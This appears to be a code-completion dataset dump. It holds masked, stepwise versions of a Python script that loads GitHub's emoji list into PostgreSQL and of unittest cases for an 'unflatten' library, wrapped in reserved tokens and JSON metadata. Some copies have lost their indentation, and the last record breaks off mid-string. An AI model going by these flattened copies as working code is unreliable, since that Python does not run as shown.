<|reserved_special_token_1|>
<|reserved_special_token_0|>
engine = create_engine('postgresql://myuser:mypass@localhost:5432/mydb')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
response = requests.get('https://api.github.com/emojis')
response = json.loads(response.text)
for key, value in response.items():
Emoji = Emojis(name=key, url=value)
session.add(Emoji)
session.commit()
<|reserved_special_token_1|>
from Psql_Database_Setup import *
import requests, json
engine = create_engine('postgresql://myuser:mypass@localhost:5432/mydb')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
response = requests.get('https://api.github.com/emojis')
response = json.loads(response.text)
for key, value in response.items():
Emoji = Emojis(name=key, url=value)
session.add(Emoji)
session.commit()
<|reserved_special_token_1|>
from Psql_Database_Setup import *
import requests, json
engine = create_engine('postgresql://myuser:mypass@localhost:5432/mydb')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
response = requests.get("https://api.github.com/emojis")
response = json.loads(response.text)
for key,value in response.items():
Emoji = Emojis(name=key, url = value)
session.add(Emoji)
session.commit()
|
flexible
|
{
"blob_id": "0aa95b6a72472e8e260c07f4c42a327384ca0da4",
"index": 9173,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor key, value in response.items():\n Emoji = Emojis(name=key, url=value)\n session.add(Emoji)\n session.commit()\n",
"step-3": "<mask token>\nengine = create_engine('postgresql://myuser:mypass@localhost:5432/mydb')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\nresponse = requests.get('https://api.github.com/emojis')\nresponse = json.loads(response.text)\nfor key, value in response.items():\n Emoji = Emojis(name=key, url=value)\n session.add(Emoji)\n session.commit()\n",
"step-4": "from Psql_Database_Setup import *\nimport requests, json\nengine = create_engine('postgresql://myuser:mypass@localhost:5432/mydb')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\nresponse = requests.get('https://api.github.com/emojis')\nresponse = json.loads(response.text)\nfor key, value in response.items():\n Emoji = Emojis(name=key, url=value)\n session.add(Emoji)\n session.commit()\n",
"step-5": "from Psql_Database_Setup import *\r\nimport requests, json\r\n\r\nengine = create_engine('postgresql://myuser:mypass@localhost:5432/mydb')\r\nBase.metadata.bind = engine\r\n\r\nDBSession = sessionmaker(bind=engine)\r\nsession = DBSession()\r\n\r\nresponse = requests.get(\"https://api.github.com/emojis\")\r\nresponse = json.loads(response.text)\r\n\r\nfor key,value in response.items():\r\n Emoji = Emojis(name=key, url = value)\r\n session.add(Emoji)\r\n session.commit()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class RecognizeListsTestCase(unittest.TestCase):
def test_simple(self):
self.assertListEqual(_recognize_lists({(0): 'a', (1): {'b': -1, 'c':
{(0): 'd', (1): -2}}}), ['a', {'b': -1, 'c': ['d', -2]}])
def test_again(self):
self.assertDictEqual(unflatten({'a': 1, 'b': {(0): 'c', (1): {(0):
'd', (1): {'e': {'f': -1, 'g': 'h'}}}}}), {'a': 1, 'b': ['c', [
'd', {'e': {'f': -1, 'g': 'h'}}]]})
class FlattenTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f':
-1, 'g': 'h'}}]]}), {'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',
'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'})
def test_dot_colon(self):
self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f':
-1, 'g': 'h'}}]]}, join=dot_colon_join), {'a': 1, 'b:0': 'c',
'b:1:0': 'd', 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'})
class UnflattenTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(unflatten({'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',
'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'}), {'a': 1, 'b': ['c',
['d', {'e': {'f': -1, 'g': 'h'}}]]})
def test_dot_colon(self):
self.assertDictEqual(unflatten({'a': 1, 'b:0': 'c', 'b:1:0': 'd',
'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'}, split=dot_colon_split), {
'a': 1, 'b': ['c', ['d', {'e': {'f': -1, 'g': 'h'}}]]})
class DotColonJoinTestCase(unittest.TestCase):
def test_simple(self):
self.assertSequenceEqual(dot_colon_join(('a',)), 'a')
self.assertSequenceEqual(dot_colon_join(('b', 0)), 'b:0')
self.assertSequenceEqual(dot_colon_join(('b', 1)), 'b:1')
self.assertSequenceEqual(dot_colon_join(('b', 2, 'e')), 'b:2.e')
self.assertSequenceEqual(dot_colon_join(('b', 2, 'f')), 'b:2.f')
class DotColonSplitTestCase(unittest.TestCase):
def test_simple(self):
self.assertTupleEqual(dot_colon_split('a'), ('a',))
self.assertTupleEqual(dot_colon_split('b:0'), ('b', 0))
self.assertTupleEqual(dot_colon_split('b:1'), ('b', 1))
self.assertTupleEqual(dot_colon_split('b:2.e'), ('b', 2, 'e'))
self.assertTupleEqual(dot_colon_split('b:2.f'), ('b', 2, 'f'))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TreeToPathTuplesWithValuesTestCase(unittest.TestCase):
def test_simple(self):
self.assertSequenceEqual(list(_tree_to_path_tuples_with_values({'a':
['b', {'e': 1}]})), [(('a', 0), 'b'), (('a', 1, 'e'), 1)])
class PathTuplesWithValuesToDictTreeTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(_path_tuples_with_values_to_dict_tree([(('a',
0), 'b'), (('a', 1, 'e'), 1)]), {'a': {(0): 'b', (1): {'e': 1}}})
class RecognizeListsTestCase(unittest.TestCase):
def test_simple(self):
self.assertListEqual(_recognize_lists({(0): 'a', (1): {'b': -1, 'c':
{(0): 'd', (1): -2}}}), ['a', {'b': -1, 'c': ['d', -2]}])
def test_again(self):
self.assertDictEqual(unflatten({'a': 1, 'b': {(0): 'c', (1): {(0):
'd', (1): {'e': {'f': -1, 'g': 'h'}}}}}), {'a': 1, 'b': ['c', [
'd', {'e': {'f': -1, 'g': 'h'}}]]})
class FlattenTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f':
-1, 'g': 'h'}}]]}), {'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',
'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'})
def test_dot_colon(self):
self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f':
-1, 'g': 'h'}}]]}, join=dot_colon_join), {'a': 1, 'b:0': 'c',
'b:1:0': 'd', 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'})
class UnflattenTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(unflatten({'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',
'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'}), {'a': 1, 'b': ['c',
['d', {'e': {'f': -1, 'g': 'h'}}]]})
def test_dot_colon(self):
self.assertDictEqual(unflatten({'a': 1, 'b:0': 'c', 'b:1:0': 'd',
'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'}, split=dot_colon_split), {
'a': 1, 'b': ['c', ['d', {'e': {'f': -1, 'g': 'h'}}]]})
class DotColonJoinTestCase(unittest.TestCase):
def test_simple(self):
self.assertSequenceEqual(dot_colon_join(('a',)), 'a')
self.assertSequenceEqual(dot_colon_join(('b', 0)), 'b:0')
self.assertSequenceEqual(dot_colon_join(('b', 1)), 'b:1')
self.assertSequenceEqual(dot_colon_join(('b', 2, 'e')), 'b:2.e')
self.assertSequenceEqual(dot_colon_join(('b', 2, 'f')), 'b:2.f')
class DotColonSplitTestCase(unittest.TestCase):
def test_simple(self):
self.assertTupleEqual(dot_colon_split('a'), ('a',))
self.assertTupleEqual(dot_colon_split('b:0'), ('b', 0))
self.assertTupleEqual(dot_colon_split('b:1'), ('b', 1))
self.assertTupleEqual(dot_colon_split('b:2.e'), ('b', 2, 'e'))
self.assertTupleEqual(dot_colon_split('b:2.f'), ('b', 2, 'f'))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BracketsReduceTestCase(unittest.TestCase):
def test_one_element(self):
self.assertEqual(brackets_join(['aa']), 'aa')
def test_simple(self):
self.assertEqual(brackets_join(['aa', 1, 'bb', 2]), 'aa[1][bb][2]')
class TreeToPathTuplesWithValuesTestCase(unittest.TestCase):
def test_simple(self):
self.assertSequenceEqual(list(_tree_to_path_tuples_with_values({'a':
['b', {'e': 1}]})), [(('a', 0), 'b'), (('a', 1, 'e'), 1)])
class PathTuplesWithValuesToDictTreeTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(_path_tuples_with_values_to_dict_tree([(('a',
0), 'b'), (('a', 1, 'e'), 1)]), {'a': {(0): 'b', (1): {'e': 1}}})
class RecognizeListsTestCase(unittest.TestCase):
def test_simple(self):
self.assertListEqual(_recognize_lists({(0): 'a', (1): {'b': -1, 'c':
{(0): 'd', (1): -2}}}), ['a', {'b': -1, 'c': ['d', -2]}])
def test_again(self):
self.assertDictEqual(unflatten({'a': 1, 'b': {(0): 'c', (1): {(0):
'd', (1): {'e': {'f': -1, 'g': 'h'}}}}}), {'a': 1, 'b': ['c', [
'd', {'e': {'f': -1, 'g': 'h'}}]]})
class FlattenTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f':
-1, 'g': 'h'}}]]}), {'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',
'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'})
def test_dot_colon(self):
self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f':
-1, 'g': 'h'}}]]}, join=dot_colon_join), {'a': 1, 'b:0': 'c',
'b:1:0': 'd', 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'})
class UnflattenTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(unflatten({'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',
'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'}), {'a': 1, 'b': ['c',
['d', {'e': {'f': -1, 'g': 'h'}}]]})
def test_dot_colon(self):
self.assertDictEqual(unflatten({'a': 1, 'b:0': 'c', 'b:1:0': 'd',
'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'}, split=dot_colon_split), {
'a': 1, 'b': ['c', ['d', {'e': {'f': -1, 'g': 'h'}}]]})
class DotColonJoinTestCase(unittest.TestCase):
def test_simple(self):
self.assertSequenceEqual(dot_colon_join(('a',)), 'a')
self.assertSequenceEqual(dot_colon_join(('b', 0)), 'b:0')
self.assertSequenceEqual(dot_colon_join(('b', 1)), 'b:1')
self.assertSequenceEqual(dot_colon_join(('b', 2, 'e')), 'b:2.e')
self.assertSequenceEqual(dot_colon_join(('b', 2, 'f')), 'b:2.f')
class DotColonSplitTestCase(unittest.TestCase):
def test_simple(self):
self.assertTupleEqual(dot_colon_split('a'), ('a',))
self.assertTupleEqual(dot_colon_split('b:0'), ('b', 0))
self.assertTupleEqual(dot_colon_split('b:1'), ('b', 1))
self.assertTupleEqual(dot_colon_split('b:2.e'), ('b', 2, 'e'))
self.assertTupleEqual(dot_colon_split('b:2.f'), ('b', 2, 'f'))
<|reserved_special_token_1|>
import unittest
from unflatten import _path_tuples_with_values_to_dict_tree, dot_colon_join, dot_colon_split
from unflatten import _recognize_lists
from unflatten import _tree_to_path_tuples_with_values
from unflatten import brackets_join
from unflatten import flatten
from unflatten import unflatten
class BracketsReduceTestCase(unittest.TestCase):
def test_one_element(self):
self.assertEqual(brackets_join(['aa']), 'aa')
def test_simple(self):
self.assertEqual(brackets_join(['aa', 1, 'bb', 2]), 'aa[1][bb][2]')
class TreeToPathTuplesWithValuesTestCase(unittest.TestCase):
def test_simple(self):
self.assertSequenceEqual(list(_tree_to_path_tuples_with_values({'a':
['b', {'e': 1}]})), [(('a', 0), 'b'), (('a', 1, 'e'), 1)])
class PathTuplesWithValuesToDictTreeTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(_path_tuples_with_values_to_dict_tree([(('a',
0), 'b'), (('a', 1, 'e'), 1)]), {'a': {(0): 'b', (1): {'e': 1}}})
class RecognizeListsTestCase(unittest.TestCase):
def test_simple(self):
self.assertListEqual(_recognize_lists({(0): 'a', (1): {'b': -1, 'c':
{(0): 'd', (1): -2}}}), ['a', {'b': -1, 'c': ['d', -2]}])
def test_again(self):
self.assertDictEqual(unflatten({'a': 1, 'b': {(0): 'c', (1): {(0):
'd', (1): {'e': {'f': -1, 'g': 'h'}}}}}), {'a': 1, 'b': ['c', [
'd', {'e': {'f': -1, 'g': 'h'}}]]})
class FlattenTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f':
-1, 'g': 'h'}}]]}), {'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',
'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'})
def test_dot_colon(self):
self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f':
-1, 'g': 'h'}}]]}, join=dot_colon_join), {'a': 1, 'b:0': 'c',
'b:1:0': 'd', 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'})
class UnflattenTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(unflatten({'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',
'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'}), {'a': 1, 'b': ['c',
['d', {'e': {'f': -1, 'g': 'h'}}]]})
def test_dot_colon(self):
self.assertDictEqual(unflatten({'a': 1, 'b:0': 'c', 'b:1:0': 'd',
'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'}, split=dot_colon_split), {
'a': 1, 'b': ['c', ['d', {'e': {'f': -1, 'g': 'h'}}]]})
class DotColonJoinTestCase(unittest.TestCase):
def test_simple(self):
self.assertSequenceEqual(dot_colon_join(('a',)), 'a')
self.assertSequenceEqual(dot_colon_join(('b', 0)), 'b:0')
self.assertSequenceEqual(dot_colon_join(('b', 1)), 'b:1')
self.assertSequenceEqual(dot_colon_join(('b', 2, 'e')), 'b:2.e')
self.assertSequenceEqual(dot_colon_join(('b', 2, 'f')), 'b:2.f')
class DotColonSplitTestCase(unittest.TestCase):
def test_simple(self):
self.assertTupleEqual(dot_colon_split('a'), ('a',))
self.assertTupleEqual(dot_colon_split('b:0'), ('b', 0))
self.assertTupleEqual(dot_colon_split('b:1'), ('b', 1))
self.assertTupleEqual(dot_colon_split('b:2.e'), ('b', 2, 'e'))
self.assertTupleEqual(dot_colon_split('b:2.f'), ('b', 2, 'f'))
<|reserved_special_token_1|>
import unittest
from unflatten import _path_tuples_with_values_to_dict_tree, dot_colon_join, dot_colon_split
from unflatten import _recognize_lists
from unflatten import _tree_to_path_tuples_with_values
from unflatten import brackets_join
from unflatten import flatten
from unflatten import unflatten
class BracketsReduceTestCase(unittest.TestCase):
def test_one_element(self):
self.assertEqual(brackets_join(['aa']), 'aa')
def test_simple(self):
self.assertEqual(brackets_join(['aa', 1, 'bb', 2]), 'aa[1][bb][2]')
class TreeToPathTuplesWithValuesTestCase(unittest.TestCase):
def test_simple(self):
self.assertSequenceEqual(
list(_tree_to_path_tuples_with_values(
{'a': ['b',
{'e': 1}]})),
[(('a', 0), 'b'),
(('a', 1, 'e'), 1)])
class PathTuplesWithValuesToDictTreeTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(
_path_tuples_with_values_to_dict_tree(
[(('a', 0), 'b'),
(('a', 1, 'e'), 1)]),
{'a': {0: 'b',
1: {'e': 1}}})
class RecognizeListsTestCase(unittest.TestCase):
def test_simple(self):
self.assertListEqual(
_recognize_lists(
{0: 'a',
1: {'b': -1,
'c': {0: 'd',
1: -2}}}),
['a',
{'b': -1,
'c': ['d',
-2]}])
def test_again(self):
self.assertDictEqual(
unflatten(
{'a': 1,
'b': {0: 'c',
1: {0: 'd',
1: {'e': {'f': -1,
'g': 'h'}}}}}),
{'a': 1,
'b': ['c',
['d',
{'e': {'f': -1,
'g': 'h'}}]]})
class FlattenTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(
flatten(
{'a': 1,
'b': ['c',
['d',
{'e': {'f': -1,
'g': 'h'}}]]}),
{'a': 1,
'b[0]': 'c',
'b[1][0]': 'd',
'b[1][1][e][f]': -1,
'b[1][1][e][g]': 'h'})
def test_dot_colon(self):
self.assertDictEqual(
flatten(
{'a': 1,
'b': ['c',
['d',
{'e': {'f': -1,
'g': 'h'}}]]},
join=dot_colon_join),
{'a': 1,
'b:0': 'c',
'b:1:0': 'd',
'b:1:1.e.f': -1,
'b:1:1.e.g': 'h'})
class UnflattenTestCase(unittest.TestCase):
def test_simple(self):
self.assertDictEqual(
unflatten(
{'a': 1,
'b[0]': 'c',
'b[1][0]': 'd',
'b[1][1][e][f]': -1,
'b[1][1][e][g]': 'h'}),
{'a': 1,
'b': ['c',
['d',
{'e': {'f': -1,
'g': 'h'}}]]})
def test_dot_colon(self):
self.assertDictEqual(
unflatten(
{'a': 1,
'b:0': 'c',
'b:1:0': 'd',
'b:1:1.e.f': -1,
'b:1:1.e.g': 'h'},
split=dot_colon_split),
{'a': 1,
'b': ['c',
['d',
{'e': {'f': -1,
'g': 'h'}}]]})
class DotColonJoinTestCase(unittest.TestCase):
def test_simple(self):
self.assertSequenceEqual(dot_colon_join(('a',)), 'a')
self.assertSequenceEqual(dot_colon_join(('b', 0)), 'b:0')
self.assertSequenceEqual(dot_colon_join(('b', 1)), 'b:1')
self.assertSequenceEqual(dot_colon_join(('b', 2, 'e')), 'b:2.e')
self.assertSequenceEqual(dot_colon_join(('b', 2, 'f')), 'b:2.f')
class DotColonSplitTestCase(unittest.TestCase):
def test_simple(self):
self.assertTupleEqual(dot_colon_split('a'), ('a',))
self.assertTupleEqual(dot_colon_split('b:0'), ('b', 0))
self.assertTupleEqual(dot_colon_split('b:1'), ('b', 1))
self.assertTupleEqual(dot_colon_split('b:2.e'), ('b', 2, 'e'))
self.assertTupleEqual(dot_colon_split('b:2.f'), ('b', 2, 'f'))
|
flexible
|
{
"blob_id": "5119b1b6817e002c870b4d6a19fe9aee661fff7e",
"index": 8425,
"step-1": "<mask token>\n\n\nclass RecognizeListsTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertListEqual(_recognize_lists({(0): 'a', (1): {'b': -1, 'c':\n {(0): 'd', (1): -2}}}), ['a', {'b': -1, 'c': ['d', -2]}])\n\n def test_again(self):\n self.assertDictEqual(unflatten({'a': 1, 'b': {(0): 'c', (1): {(0):\n 'd', (1): {'e': {'f': -1, 'g': 'h'}}}}}), {'a': 1, 'b': ['c', [\n 'd', {'e': {'f': -1, 'g': 'h'}}]]})\n\n\nclass FlattenTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f': \n -1, 'g': 'h'}}]]}), {'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',\n 'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'})\n\n def test_dot_colon(self):\n self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f': \n -1, 'g': 'h'}}]]}, join=dot_colon_join), {'a': 1, 'b:0': 'c',\n 'b:1:0': 'd', 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'})\n\n\nclass UnflattenTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertDictEqual(unflatten({'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',\n 'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'}), {'a': 1, 'b': ['c',\n ['d', {'e': {'f': -1, 'g': 'h'}}]]})\n\n def test_dot_colon(self):\n self.assertDictEqual(unflatten({'a': 1, 'b:0': 'c', 'b:1:0': 'd',\n 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'}, split=dot_colon_split), {\n 'a': 1, 'b': ['c', ['d', {'e': {'f': -1, 'g': 'h'}}]]})\n\n\nclass DotColonJoinTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertSequenceEqual(dot_colon_join(('a',)), 'a')\n self.assertSequenceEqual(dot_colon_join(('b', 0)), 'b:0')\n self.assertSequenceEqual(dot_colon_join(('b', 1)), 'b:1')\n self.assertSequenceEqual(dot_colon_join(('b', 2, 'e')), 'b:2.e')\n self.assertSequenceEqual(dot_colon_join(('b', 2, 'f')), 'b:2.f')\n\n\nclass DotColonSplitTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertTupleEqual(dot_colon_split('a'), ('a',))\n self.assertTupleEqual(dot_colon_split('b:0'), ('b', 0))\n self.assertTupleEqual(dot_colon_split('b:1'), ('b', 1))\n self.assertTupleEqual(dot_colon_split('b:2.e'), ('b', 2, 'e'))\n self.assertTupleEqual(dot_colon_split('b:2.f'), ('b', 2, 'f'))\n",
"step-2": "<mask token>\n\n\nclass TreeToPathTuplesWithValuesTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertSequenceEqual(list(_tree_to_path_tuples_with_values({'a':\n ['b', {'e': 1}]})), [(('a', 0), 'b'), (('a', 1, 'e'), 1)])\n\n\nclass PathTuplesWithValuesToDictTreeTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertDictEqual(_path_tuples_with_values_to_dict_tree([(('a', \n 0), 'b'), (('a', 1, 'e'), 1)]), {'a': {(0): 'b', (1): {'e': 1}}})\n\n\nclass RecognizeListsTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertListEqual(_recognize_lists({(0): 'a', (1): {'b': -1, 'c':\n {(0): 'd', (1): -2}}}), ['a', {'b': -1, 'c': ['d', -2]}])\n\n def test_again(self):\n self.assertDictEqual(unflatten({'a': 1, 'b': {(0): 'c', (1): {(0):\n 'd', (1): {'e': {'f': -1, 'g': 'h'}}}}}), {'a': 1, 'b': ['c', [\n 'd', {'e': {'f': -1, 'g': 'h'}}]]})\n\n\nclass FlattenTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f': \n -1, 'g': 'h'}}]]}), {'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',\n 'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'})\n\n def test_dot_colon(self):\n self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f': \n -1, 'g': 'h'}}]]}, join=dot_colon_join), {'a': 1, 'b:0': 'c',\n 'b:1:0': 'd', 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'})\n\n\nclass UnflattenTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertDictEqual(unflatten({'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',\n 'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'}), {'a': 1, 'b': ['c',\n ['d', {'e': {'f': -1, 'g': 'h'}}]]})\n\n def test_dot_colon(self):\n self.assertDictEqual(unflatten({'a': 1, 'b:0': 'c', 'b:1:0': 'd',\n 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'}, split=dot_colon_split), {\n 'a': 1, 'b': ['c', ['d', {'e': {'f': -1, 'g': 'h'}}]]})\n\n\nclass DotColonJoinTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertSequenceEqual(dot_colon_join(('a',)), 'a')\n self.assertSequenceEqual(dot_colon_join(('b', 0)), 'b:0')\n self.assertSequenceEqual(dot_colon_join(('b', 1)), 'b:1')\n self.assertSequenceEqual(dot_colon_join(('b', 2, 'e')), 'b:2.e')\n self.assertSequenceEqual(dot_colon_join(('b', 2, 'f')), 'b:2.f')\n\n\nclass DotColonSplitTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertTupleEqual(dot_colon_split('a'), ('a',))\n self.assertTupleEqual(dot_colon_split('b:0'), ('b', 0))\n self.assertTupleEqual(dot_colon_split('b:1'), ('b', 1))\n self.assertTupleEqual(dot_colon_split('b:2.e'), ('b', 2, 'e'))\n self.assertTupleEqual(dot_colon_split('b:2.f'), ('b', 2, 'f'))\n",
"step-3": "<mask token>\n\n\nclass BracketsReduceTestCase(unittest.TestCase):\n\n def test_one_element(self):\n self.assertEqual(brackets_join(['aa']), 'aa')\n\n def test_simple(self):\n self.assertEqual(brackets_join(['aa', 1, 'bb', 2]), 'aa[1][bb][2]')\n\n\nclass TreeToPathTuplesWithValuesTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertSequenceEqual(list(_tree_to_path_tuples_with_values({'a':\n ['b', {'e': 1}]})), [(('a', 0), 'b'), (('a', 1, 'e'), 1)])\n\n\nclass PathTuplesWithValuesToDictTreeTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertDictEqual(_path_tuples_with_values_to_dict_tree([(('a', \n 0), 'b'), (('a', 1, 'e'), 1)]), {'a': {(0): 'b', (1): {'e': 1}}})\n\n\nclass RecognizeListsTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertListEqual(_recognize_lists({(0): 'a', (1): {'b': -1, 'c':\n {(0): 'd', (1): -2}}}), ['a', {'b': -1, 'c': ['d', -2]}])\n\n def test_again(self):\n self.assertDictEqual(unflatten({'a': 1, 'b': {(0): 'c', (1): {(0):\n 'd', (1): {'e': {'f': -1, 'g': 'h'}}}}}), {'a': 1, 'b': ['c', [\n 'd', {'e': {'f': -1, 'g': 'h'}}]]})\n\n\nclass FlattenTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f': \n -1, 'g': 'h'}}]]}), {'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',\n 'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'})\n\n def test_dot_colon(self):\n self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f': \n -1, 'g': 'h'}}]]}, join=dot_colon_join), {'a': 1, 'b:0': 'c',\n 'b:1:0': 'd', 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'})\n\n\nclass UnflattenTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertDictEqual(unflatten({'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',\n 'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'}), {'a': 1, 'b': ['c',\n ['d', {'e': {'f': -1, 'g': 'h'}}]]})\n\n def test_dot_colon(self):\n self.assertDictEqual(unflatten({'a': 1, 'b:0': 'c', 'b:1:0': 'd',\n 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'}, split=dot_colon_split), {\n 'a': 1, 'b': ['c', ['d', {'e': {'f': -1, 'g': 'h'}}]]})\n\n\nclass DotColonJoinTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertSequenceEqual(dot_colon_join(('a',)), 'a')\n self.assertSequenceEqual(dot_colon_join(('b', 0)), 'b:0')\n self.assertSequenceEqual(dot_colon_join(('b', 1)), 'b:1')\n self.assertSequenceEqual(dot_colon_join(('b', 2, 'e')), 'b:2.e')\n self.assertSequenceEqual(dot_colon_join(('b', 2, 'f')), 'b:2.f')\n\n\nclass DotColonSplitTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertTupleEqual(dot_colon_split('a'), ('a',))\n self.assertTupleEqual(dot_colon_split('b:0'), ('b', 0))\n self.assertTupleEqual(dot_colon_split('b:1'), ('b', 1))\n self.assertTupleEqual(dot_colon_split('b:2.e'), ('b', 2, 'e'))\n self.assertTupleEqual(dot_colon_split('b:2.f'), ('b', 2, 'f'))\n",
"step-4": "import unittest\nfrom unflatten import _path_tuples_with_values_to_dict_tree, dot_colon_join, dot_colon_split\nfrom unflatten import _recognize_lists\nfrom unflatten import _tree_to_path_tuples_with_values\nfrom unflatten import brackets_join\nfrom unflatten import flatten\nfrom unflatten import unflatten\n\n\nclass BracketsReduceTestCase(unittest.TestCase):\n\n def test_one_element(self):\n self.assertEqual(brackets_join(['aa']), 'aa')\n\n def test_simple(self):\n self.assertEqual(brackets_join(['aa', 1, 'bb', 2]), 'aa[1][bb][2]')\n\n\nclass TreeToPathTuplesWithValuesTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertSequenceEqual(list(_tree_to_path_tuples_with_values({'a':\n ['b', {'e': 1}]})), [(('a', 0), 'b'), (('a', 1, 'e'), 1)])\n\n\nclass PathTuplesWithValuesToDictTreeTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertDictEqual(_path_tuples_with_values_to_dict_tree([(('a', \n 0), 'b'), (('a', 1, 'e'), 1)]), {'a': {(0): 'b', (1): {'e': 1}}})\n\n\nclass RecognizeListsTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertListEqual(_recognize_lists({(0): 'a', (1): {'b': -1, 'c':\n {(0): 'd', (1): -2}}}), ['a', {'b': -1, 'c': ['d', -2]}])\n\n def test_again(self):\n self.assertDictEqual(unflatten({'a': 1, 'b': {(0): 'c', (1): {(0):\n 'd', (1): {'e': {'f': -1, 'g': 'h'}}}}}), {'a': 1, 'b': ['c', [\n 'd', {'e': {'f': -1, 'g': 'h'}}]]})\n\n\nclass FlattenTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f': \n -1, 'g': 'h'}}]]}), {'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',\n 'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'})\n\n def test_dot_colon(self):\n self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f': \n -1, 'g': 'h'}}]]}, join=dot_colon_join), 